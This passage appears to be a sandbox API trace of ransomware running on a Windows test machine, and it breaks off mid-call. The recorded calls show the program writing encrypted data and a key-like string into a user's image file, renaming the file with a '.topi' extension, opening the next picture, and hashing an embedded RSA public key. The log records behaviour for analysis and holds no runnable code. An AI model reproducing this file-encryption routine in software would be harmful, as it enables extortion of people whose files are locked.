[0096.764] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0096.764] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02ca8 [0096.764] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ad8 [0096.764] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02cf0 [0096.764] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4af0 [0096.764] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b20 [0096.764] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0096.764] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b38 [0096.764] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.764] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.764] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0096.764] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0096.764] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b20 | out: hHeap=0x680000) returned 1 [0096.764] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b38 | out: hHeap=0x680000) returned 1 [0096.764] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0096.764] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.764] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.764] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0096.764] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0096.764] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4b38 [0096.764] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0096.764] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4b20 [0096.764] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0096.765] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.765] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.765] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.765] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.765] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.765] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0096.765] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.765] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.765] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b38 | out: hHeap=0x680000) returned 1 [0096.765] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.765] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b20 | out: hHeap=0x680000) returned 1 [0096.765] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.765] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.765] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0096.765] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.765] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0096.765] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.765] GetCurrentThreadId () returned 0x8c4 [0096.765] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0096.765] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f86a0 [0096.765] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.766] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0096.766] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.766] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.766] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.766] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0096.766] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.766] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.766] GetCurrentThreadId () returned 0x8c4 [0096.766] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.766] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.766] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0096.766] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.766] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.766] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.766] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.766] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0096.766] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0096.766] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.766] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.766] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.766] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0096.766] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.767] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0096.767] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.767] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.767] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.767] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.767] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.767] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.767] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.767] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.767] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b20 [0096.767] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.767] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0096.767] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.767] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.767] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0096.767] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.767] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0096.767] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b38 [0096.767] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0096.767] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.767] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0096.767] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b08 [0096.767] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0096.767] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0096.767] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.767] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0096.767] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.768] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0096.768] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.768] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4b50 [0096.768] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0096.768] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e49d0 [0096.768] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0096.768] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0096.768] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.768] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0096.768] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.768] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0096.768] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b20 | out: hHeap=0x680000) returned 1 [0096.768] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b20 [0096.768] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.768] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0096.768] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0096.768] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0096.768] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0096.768] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0096.768] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0096.768] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0096.768] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.768] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0096.768] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b20 | out: hHeap=0x680000) returned 1 [0096.768] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0096.768] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0096.769] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0096.769] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.769] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df228 | out: hHeap=0x680000) returned 1 [0096.769] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0096.769] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0096.769] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0096.769] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0096.769] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0096.769] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.769] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.769] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.769] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b50 | out: hHeap=0x680000) returned 1 [0096.769] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.769] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0096.769] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.769] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b38 | out: hHeap=0x680000) returned 1 [0096.769] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b08 | out: hHeap=0x680000) returned 1 [0096.769] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0096.769] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0096.769] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0096.769] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4af0 | out: hHeap=0x680000) returned 1 [0096.769] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a02cf0 | out: hHeap=0x680000) returned 1 [0096.769] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.769] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0096.769] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0096.769] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0096.769] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0096.770] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.770] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.770] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0096.770] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0096.770] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.770] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0096.770] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0xe3ee, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0xe3ee, lpOverlapped=0x0) returned 1 [0096.770] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0096.770] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xe3f3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.770] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0096.770] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0096.770] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.770] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0096.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0096.770] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0096.770] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.770] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.771] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0096.771] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.771] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0096.771] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0096.771] CloseHandle (hObject=0x6a8) returned 1 [0096.777] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0096.777] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x880) returned 0x31cf750 [0096.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df228 | out: hHeap=0x680000) returned 1 [0096.777] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\WhGX7YXsk.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ik1v\\whgx7yxsk.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\WhGX7YXsk.png.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ik1v\\whgx7yxsk.png.topi")) returned 1 [0096.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.777] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.779] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4258 | out: hHeap=0x680000) returned 1 [0096.779] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8c4bec0, ftCreationTime.dwHighDateTime=0x1d5b935, ftLastAccessTime.dwLowDateTime=0x9f823d90, ftLastAccessTime.dwHighDateTime=0x1d5ba15, ftLastWriteTime.dwLowDateTime=0x9f823d90, ftLastWriteTime.dwHighDateTime=0x1d5ba15, nFileSizeHigh=0x0, nFileSizeLow=0x18fae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WjYIWF0mU2KcO6Nbd.bmp", cAlternateFileName="WJYIWF~1.BMP")) returned 1 [0096.779] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.779] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4258 [0096.779] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.779] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\WjYIWF0mU2KcO6Nbd.bmp") returned=".bmp" [0096.779] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\WjYIWF0mU2KcO6Nbd.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ik1v\\wjyiwf0mu2kco6nbd.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.779] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=102318) returned 1 [0096.779] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.782] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x18f88, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.782] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.783] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.783] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.783] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.783] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x18fae, lpOverlapped=0x0) returned 1 [0096.784] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.784] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0096.784] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.784] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.784] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0096.784] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.785] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.785] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.785] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0096.785] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.785] GetLastError () returned 0x0 [0096.785] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.785] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0096.785] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.785] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.785] UuidToStringA (in: 